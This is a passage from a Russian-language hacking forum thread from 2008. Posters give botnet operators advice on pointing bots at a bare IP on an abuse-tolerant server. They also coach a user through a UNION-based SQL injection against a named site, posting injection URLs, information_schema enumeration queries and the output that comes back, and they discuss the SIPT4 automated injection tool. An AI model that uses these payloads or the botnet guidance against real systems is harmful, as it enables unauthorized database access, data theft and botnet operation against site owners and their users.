ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4381  
Старый 28.12.2008, 05:40
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Набери в браузере 77.88.21.3
попадёшь на яндекс.
Вот так и ты, можешь юзать вместо домена - ip.
Тебе ведь не клиентов заманивать, а трафф принимать. Для ботнета самое то.
 
Ответить с цитированием

  #4382  
Старый 28.12.2008, 05:41
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от diznt  
я не понимаю как это? объясни
эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ?
по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать ..
так вот, какая им разница куда стучать??
--
и вообще, нах домен абузный, ты ж не спамить домен собрался ..
ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.
 
Ответить с цитированием

  #4383  
Старый 28.12.2008, 19:22
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию

хелп.
нашёл скулю
http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2, 3,concat(table_name,0x3a,column_name),5+from+infor mation_schema.columns
вывело кучу всего

TRIGGERS:CREATED
TRIGGERS:SQL_MODE
TRIGGERSEFINER
USER_PRIVILEGES:GRANTEE
USER_PRIVILEGES:TABLE_CATALOG
USER_PRIVILEGES:PRIVILEGE_TYPE
USER_PRIVILEGES:IS_GRANTABLE
VIEWS:TABLE_CATALOG

(часть списка)

Но читать их не получается, всегда ошибка Table doesn't exist
Можно что-нибудь сделать?
 
Ответить с цитированием

  #4384  
Старый 28.12.2008, 19:29
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name
 
Ответить с цитированием

  #4385  
Старый 28.12.2008, 19:40
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию

Цитата:
Сообщение от aka PSIH  
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name
вывелось так

information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
information_schema:TRIGGERSEFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE
 
Ответить с цитированием

  #4386  
Старый 28.12.2008, 19:42
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

ну выводи теперь то что тебе нужно, в чем проблемма?
 
Ответить с цитированием

  #4387  
Старый 28.12.2008, 19:44
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.

Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).
 
Ответить с цитированием

  #4388  
Старый 28.12.2008, 20:17
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

в {} принтабельное поле из найденных (мог бы и сам догадаться)

офф. сайт проги - http://dbattack.com/

Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.
 
Ответить с цитированием

  #4389  
Старый 28.12.2008, 20:32
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.
 
Ответить с цитированием

  #4390  
Старый 28.12.2008, 20:39
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Pashkela правильно сказал, просто ты его недопонял.

{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ